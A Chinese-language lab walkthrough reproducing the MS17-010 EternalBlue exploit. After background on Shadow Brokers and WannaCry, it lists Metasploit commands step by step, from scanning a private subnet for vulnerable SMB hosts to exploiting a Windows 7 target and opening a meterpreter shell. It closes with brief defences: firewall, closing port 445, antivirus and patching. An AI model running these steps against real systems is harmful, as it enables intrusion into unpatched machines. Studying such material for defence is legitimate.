1.什么是永恒之蓝:
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 ----百度百科
2.复刻:
工具:kali-linux 2022(攻击机)(IP:192.168.0,108)
windows7 X64(靶机)(已经打开445端口)(IP:192.168.0.104)
两系统在同一个网段
方法:
准备:
1.查找使用4444端口的程序
lsof -i:44442.杀掉使用4444端口的程序
kill -9 PIDPID就是上面查找到的程序的编号,如果不把进程杀掉,后面会报错
1.加载工具
msfconsole
2.搜索攻击模块
search ms17-0103.选择攻击模块(这个是搜索的)
use auxiliary/scanner/smb/smb_ms17_0104.看一下要设置的参数
show options5.设置IP(就是在这个网段下搜索有漏洞的IP)
set rhosts 192.168.0.1/246.设置线程
set threads 507.开始搜索
run8.更换攻击模块
use windows/smb/ms17_010_eternalblue9.查看要设置的参数
show options10.设置IP
set rhosts 192.168.0.104(这就是填我们之前搜到的IP)11.看一下可否攻击
check12.开始攻击
run这时候就攻击成功,然后我们就进到了meterpreter
1.屏幕截图
screenshot2.进入shell
shell3.更改一下编码,要不然都是乱码
chcp 65001后面的就简单了。
ms17-010永恒之蓝渗透攻击
防范:1.开启防火墙,关闭445端口
2.安装杀毒软件文章来源:https://www.toymoban.com/news/detail-475029.html
3.及时更新windows,微软在2017年发布了ms17-010的补丁文章来源地址https://www.toymoban.com/news/detail-475029.html
到了这里,关于ms17-010永恒之蓝使用和防范(内附视频)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
![复现永恒之蓝[MS17_010]](https://imgs.yssmx.com/Uploads/2024/02/428577-1.png)
